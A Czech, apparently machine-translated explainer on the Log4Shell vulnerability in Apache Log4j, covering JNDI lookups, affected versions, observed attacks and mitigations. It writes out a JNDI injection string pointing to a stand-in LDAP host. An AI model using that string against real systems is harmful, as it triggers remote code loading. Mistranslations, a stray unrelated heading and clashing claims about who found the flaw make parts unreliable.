Obsah[Skrýt][Ukázat]
Koncem listopadu 2021 jsme odhalili velkou hrozbu pro kybernetickou bezpečnost. Toto zneužití by potenciálně ovlivnilo miliony počítačových systémů po celém světě.
Toto je průvodce zranitelností Log4j a tím, jak přehlížená chyba v designu nechala více než 90 % světových počítačových služeb otevřených útoku.
Apache Log4j je open-source protokolovací nástroj založený na Javě vyvinutý nadací Apache Software Foundation. Původně napsal Ceki Gülcü v roce 2001, nyní je součástí Apache Logging Services, projektu Apache Software Foundation.
Společnosti po celém světě používají knihovnu Log4j k umožnění protokolování svých aplikací. Ve skutečnosti je knihovna Java tak všudypřítomná, že ji najdete v aplikacích od Amazonu, Microsoftu, Google a dalších.
Význam knihovny znamená, že jakákoli potenciální chyba v kódu by mohla způsobit, že miliony počítačů budou vystaveny hackerům. Dne 24. listopadu 2021 společnost A Cloud Security výzkumník pracující pro Alibaba objevil hroznou chybu.
Chyba zabezpečení Log4j, známá také jako Log4Shell, existovala bez povšimnutí od roku 2013. Tato zranitelnost umožňovala škodlivým aktérům spouštět kód na postižených systémech se systémem Log4j. Veřejně to bylo zveřejněno 9. prosince 2021
Odborníci v oboru nazývají chybu Log4Shell největší zranitelnost v nedávné paměti.
V týdnu po zveřejnění zranitelnosti týmy kybernetické bezpečnosti odhalily miliony útoků. Někteří výzkumníci dokonce pozorovali rychlost přes sto útoků za minutu.
Jak to funguje?
Abychom pochopili, proč je Log4Shell tak nebezpečný, musíme pochopit, čeho je schopen.
Chyba zabezpečení Log4Shell umožňuje spuštění libovolného kódu, což v podstatě znamená, že útočník může na cílovém počítači spustit jakýkoli příkaz nebo kód.
Jak toho dosáhne?
Nejprve musíme pochopit, co je JNDI.
Java Naming and Directory Interface (JNDI) je služba Java, která umožňuje programům Java zjišťovat a vyhledávat data a zdroje prostřednictvím názvu. Tyto adresářové služby jsou důležité, protože poskytují uspořádanou sadu záznamů, na které mohou vývojáři snadno odkazovat při vytváření aplikací.
JNDI může používat různé protokoly pro přístup k určitému adresáři. Jedním z těchto protokolů je Lightweight Directory Access Protocol neboli LDAP.
Při protokolování řetězce, log4j provádí substituci řetězců, když narazí na výrazy formuláře ${prefix:name}
.
Například, Text: ${java:version}
může být přihlášen jako Text: Java verze 1.8.0_65. Tyto druhy substitucí jsou běžné.
Můžeme mít i výrazy jako např Text: ${jndi:ldap://example.com/file}
který používá systém JNDI k načtení objektu Java z adresy URL prostřednictvím protokolu LDAP.
To efektivně načte data pocházející z této adresy URL do počítače. Jakýkoli potenciální hacker může hostit škodlivý kód na veřejné adrese URL a čekat, až jej zalogují počítače používající Log4j.
Protože obsah zpráv protokolu obsahuje uživatelsky řízená data, mohou hackeři vkládat své vlastní odkazy JNDI, které odkazují na servery LDAP, které ovládají. Tyto servery LDAP mohou být plné škodlivých objektů Java, které může JNDI spustit prostřednictvím této chyby zabezpečení.
Co je ještě horší je, že nezáleží na tom, zda je aplikace na straně serveru nebo aplikace na straně klienta.
Dokud existuje způsob, jak může zapisovač číst útočníkův škodlivý kód, aplikace je stále otevřena zneužití.
Kdo je postižen?
Tato chyba zabezpečení se týká všech systémů a služeb, které používají APache Log4j, s verzemi 2.0 až 2.14.1 včetně.
Několik bezpečnostních expertů uvádí, že zranitelnost může mít dopad na řadu aplikací používajících Java.
Chyba byla poprvé objevena ve videohře Minecraft vlastněné společností Microsoft. Microsoft vyzval své uživatele, aby upgradovali svůj software Minecraft z edice Java, aby se předešlo jakémukoli riziku.
Jen Easterly, ředitelka Agentury pro kybernetickou bezpečnost a bezpečnost infrastruktury (CISA), říká, že prodejci mají hlavní zodpovědnost zabránit koncovým uživatelům, aby tuto chybu zabezpečení zneužili zákeřní činitelé.
„Prodejci by také měli komunikovat se svými zákazníky, aby zajistili, že koncoví uživatelé vědí, že jejich produkt obsahuje tuto chybu zabezpečení, a měli by upřednostňovat aktualizace softwaru.“
Útoky už prý začaly. Společnost Symantec, která poskytuje software pro kybernetickou bezpečnost, zaznamenala různý počet žádostí o útok.
Zde je několik příkladů typů útoků, které výzkumníci odhalili:
- botnety
Botnety jsou sítě počítačů, které jsou pod kontrolou jediné útočící strany. Pomáhají provádět DDoS útoky, krást data a další podvody. Výzkumníci pozorovali botnet Muhstik ve skriptech shellu stažených z exploitu Log4j.
- Trojan XMRig Miner
XMRig je open-source těžař kryptoměn, který využívá CPU k těžbě tokenu Monero. Kyberzločinci mohou nainstalovat XMRig do zařízení lidí, aby mohli využívat svůj výpočetní výkon bez jejich vědomí.
- Khonsari Ransomware
Ransomware označuje formu malwaru, pro kterou je navržen šifrování souborů na počítači. Útočníci pak mohou požadovat platbu výměnou za poskytnutí přístupu zpět k zašifrovaným souborům. Výzkumníci objevili ransomware Khonsari v útocích Log4Shell. Zaměřují se na servery Windows a využívají rámec .NET.
Co bude dál?
Odborníci předpovídají, že úplné odstranění chaosu způsobeného zranitelností Log4J může trvat měsíce nebo možná i roky.
Tento proces zahrnuje aktualizaci každého postiženého systému opravenou verzí. I když jsou všechny tyto systémy opraveny, stále existuje hrozba možných zadních vrátek, které hackeři již možná přidali do okna, že servery byly otevřené pro útok.
Mnoho řešení a zmírnění existují, aby zabránily zneužití aplikací touto chybou. Nová verze Log4j 2.15.0-rc1 změnila různá nastavení, aby tuto chybu zabezpečení zmírnila.
Všechny funkce využívající JNDI budou ve výchozím nastavení zakázány a také bylo omezeno vzdálené vyhledávání. Vypnutí funkce vyhledávání v nastavení Log4j pomůže snížit riziko možných zneužití.
Mimo Log4j stále existuje potřeba širšího plánu, jak zabránit zneužití open source.
Začátkem května Bílý dům vydal zprávu výkonná objednávka jehož cílem bylo zlepšit národní kybernetickou bezpečnost. Zahrnovalo ustanovení o softwarovém kusovníku (SBOM), což byl v podstatě formální dokument obsahující seznam všech položek potřebných k sestavení aplikace.
To zahrnuje díly jako např open source balíčky, závislosti a API používané pro vývoj. Ačkoli je myšlenka SBOM užitečná pro transparentnost, skutečně pomůže spotřebiteli?
Upgrade závislostí může být příliš velkým problémem. Společnosti se mohou rozhodnout zaplatit jakékoli pokuty, než aby riskovaly ztrácení času navíc hledáním alternativních balíčků. Možná budou tyto SBOM užitečné pouze v případě, že jejich rozsah je dále omezena.
Proč investovat do čističky vzduchu?
Problém Log4j je pro organizace víc než jen technický problém.
Vedoucí firmy si musí být vědomi potenciálních rizik, která mohou nastat, když jejich servery, produkty nebo služby spoléhají na kód, který sami neudržují.
Spoléhat se na open-source aplikace a aplikace třetích stran je vždy spojeno s určitým rizikem. Společnosti by měly zvážit vypracování strategií zmírnění rizik, než se objeví nové hrozby.
Velká část webu se spoléhá na software s otevřeným zdrojovým kódem spravovaný tisíci dobrovolníků po celém světě.
Pokud chceme, aby byl web bezpečný, měly by vlády a korporace investovat do financování open source úsilí a agentur pro kybernetickou bezpečnost, jako je např. CISA.
Napsat komentář